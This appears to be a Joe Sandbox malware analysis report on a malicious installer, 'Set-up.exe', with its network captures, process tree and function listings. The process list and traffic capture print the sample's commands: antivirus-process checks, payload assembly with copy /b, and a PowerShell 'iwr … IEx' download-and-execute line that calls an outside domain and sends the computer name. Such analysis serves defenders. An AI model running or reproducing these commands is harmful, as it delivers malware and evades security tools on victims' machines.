d4Ks5QD7nM7LV2NU7r2C95bpJCd5DJBsijLCV3Xdp0LmtxtXJ6m/bO3QJBPpjic1YyvSES97wou8tDVSty4kEZXxj4YjuN+rCaBl1gn6BbW0KwJAOy8zTkgUkHTWynWFVJX+xqLdG4mMUFDxLEhAASAvsyAeWkb7vWRQsENbUEckRDoCRQ2qCc6gVdL8WsVw1MvmAR5Os8+I8OQFVn6glz
2025-01-07 13:51:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	185.161.251.21	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:57 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-07 13:51:57 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Tue, 07 Jan 2025 13:51:57 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-07 13:51:57 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	08:51:01
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\'Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\'Set-up.exe"
Imagebase:	0x400000
File size:	73'410'924 bytes
MD5 hash:	9284C1E1BE5769DC80792308A978330A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:51:02
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Breasts Breasts.cmd & Breasts.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:51:02
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:51:04
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x6f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:51:04
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x980000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:51:04
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x6f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:51:04
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x980000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:51:05
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 221480
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:51:05
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Premium
Imagebase:	0x6a0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:51:05
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "SIGNIFICANT" Collective
Imagebase:	0x980000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:51:05
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 221480\Fires.com + Sk + Sb + Entire + Descriptions + Thats + Educators + Believe + Childrens + Pioneer + Retrieved 221480\Fires.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:51:06
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Poster + ..\Debate + ..\Scheduling + ..\Fascinating + ..\Groove + ..\Stories + ..\Mailman F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:51:06
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com
Wow64 process (32bit):	true
Commandline:	Fires.com F
Imagebase:	0xd40000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:51:06
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x2c0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:51:56
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:	0x400000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:51:56
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

New install of "%s" to "%s", xrefs: 00405182
{, xrefs: 00405352
@rD, xrefs: 004053D7

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

\Temp, xrefs: 00403A1B
~nsu.tmp, xrefs: 00403AF7
/D=, xrefs: 004039A6
NCRC, xrefs: 0040397C
1C, xrefs: 00403B56
SeShutdownPrivilege, xrefs: 00403C16
Error launching installer, xrefs: 00403A7D
NSIS Error, xrefs: 004038E2
_?=, xrefs: 00403A64

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
